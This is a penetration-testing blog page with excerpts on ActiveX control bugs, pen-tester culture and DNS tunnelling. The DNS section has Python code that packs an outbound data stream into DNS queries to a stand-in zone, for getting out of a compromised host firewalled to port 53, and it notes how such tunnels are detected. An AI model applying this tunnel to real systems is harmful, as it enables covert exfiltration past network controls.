Zen-Hacking

ActiveX Repurposing.. (aka: Other bugs your static analyzer will never find..) (aka 0day^H^H 485day bug!)

Earlier this week we had an internal presentation on Attacking ActiveX Controls. We held it mainly because of the ridiculously high hit rate we get whenever we look at controls with even a slight security bent.. When building the presentation I dug up an old advisory we never publicly released (obviously we reported it to the vendor, who (kinda) promptly fixed the bug (without giving us any credit…

DNS Tunnels (RE-REDUX)

On a recent assessment we came across the following scenario:
1) We have command execution through a web command interpreter script (cmd.jsp) on a remote Linux webserver
2) The box is firewalled, allowing only UDP 53 ingress and egress
3) The box is sitting on the network perimeter, with one public IP and one internal IP, and not in a DMZ
So we want to tunnel from the SensePost offices…
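When the only thing the firewall lets through is UDP 53, the outbound channel has to be carried in DNS query names: the host with cmd.jsp sends lookups for names under a zone the assessor's server is authoritative for, and the data is the name itself. The block below is an added example written for this page, not code from the original post or from any SensePost tool; it shows the framing side of such a tunnel (splitting a byte stream into RFC 1035-compliant names, reassembling it at the authoritative server, and building/parsing the wire-format query). The zone `t.example.com`, the sample payload and all function names are assumptions made for the illustration; the return channel (data in the answers) is not shown.

```python
import base64
import math
import struct

MAX_LABEL = 63   # RFC 1035: one label is at most 63 octets
MAX_NAME = 253   # RFC 1035: a whole name is at most 255 octets on the wire, 253 in dotted text form
SEQ_LEN = 8      # hex sequence counter prepended to every query so the far end can reorder


def _b32(data: bytes) -> str:
    # base32, not base64: DNS names are case-insensitive and some resolvers
    # randomise query case (0x20 encoding), so the alphabet must be case-safe
    return base64.b32encode(data).decode("ascii").rstrip("=").lower()


def _unb32(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def max_payload_per_query(domain: str) -> int:
    """Largest number of raw bytes whose base32 form, split into labels, still fits one query name."""
    budget = MAX_NAME - (SEQ_LEN + 1) - len(domain)   # chars left for data labels and their dots
    n = (budget * 5) // 8                             # upper bound: 5 bytes -> 8 base32 chars
    while n > 0:
        chars = math.ceil(n * 8 / 5)
        dots = math.ceil(chars / MAX_LABEL)           # one dot after each data label
        if chars + dots <= budget:
            return n
        n -= 1
    raise ValueError("domain too long to carry any payload")


def encode_stream(data: bytes, domain: str) -> list[str]:
    """Client side: turn an outbound byte stream into a list of query names under `domain`."""
    size = max_payload_per_query(domain)
    names = []
    for seq, off in enumerate(range(0, len(data), size)):
        text = _b32(data[off:off + size])
        labels = [text[i:i + MAX_LABEL] for i in range(0, len(text), MAX_LABEL)]
        name = ".".join([f"{seq:0{SEQ_LEN}x}", *labels, domain])
        assert len(name) <= MAX_NAME
        names.append(name)
    return names


def decode_stream(names: list[str], domain: str) -> bytes:
    """Server side: reassemble the stream from the names seen by the authoritative server.
    Queries may arrive out of order or twice (UDP retransmits, resolver retries), so key on seq."""
    suffix = "." + domain
    chunks = {}
    for name in names:
        if not name.lower().endswith(suffix.lower()):
            continue                                  # unrelated query hitting the same server
        body = name[:-len(suffix)]
        seq_label, _, payload = body.partition(".")
        chunks[int(seq_label, 16)] = _unb32(payload.replace(".", ""))
    return b"".join(chunks[k] for k in sorted(chunks))


def build_query(name: str, txid: int) -> bytes:
    """Wire-format DNS query (TXT, class IN, recursion desired) for one tunnel name."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", 16, 1)  # QTYPE TXT, QCLASS IN


def parse_qname(packet: bytes) -> str:
    """Pull the queried name back out of a wire-format query (what the far-end server does)."""
    labels, pos = [], 12
    while packet[pos] != 0:
        n = packet[pos]
        labels.append(packet[pos + 1:pos + 1 + n].decode("ascii"))
        pos += 1 + n
    return ".".join(labels)


if __name__ == "__main__":
    domain = "t.example.com"               # assumption: a zone the assessor's server is authoritative for
    payload = b"id\nuname -a\n" * 40       # constructed sample of traffic to push out through port 53
    queries = [build_query(n, i) for i, n in enumerate(encode_stream(payload, domain))]
    seen = [parse_qname(q) for q in reversed(queries)]  # arrival order is not guaranteed
    assert decode_stream(seen, domain) == payload
    print(f"{len(payload)} bytes carried in {len(queries)} queries of <= {MAX_NAME} chars")
```

Two practical points the framing has to get right: every label must stay at or under 63 characters and the whole name at or under 253, or recursive resolvers on the path will drop the query before it ever reaches your server; and the sequence label is what lets the server survive the duplicates and reordering that come with pushing a stream through other people's caching resolvers. Chasing the queries through the victim's own resolver also means the tunnel's names end up in that resolver's logs, which is the detection side of this technique.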

In Defense of Testing Pens… (aka how to keep your soul while being a pen-tester)

A short while back, a discussion broke out on a mailing list about the nature of being a pen-tester. The discussion quickly gravitated towards the number of "security" companies where the number of projects far outweighs how interesting those projects are, leading rapidly to a cookie-cutter mentality toward pen-test engagements.. Of course, if you have spent any time in the industry, you already know this to be true.. the obvious danger with…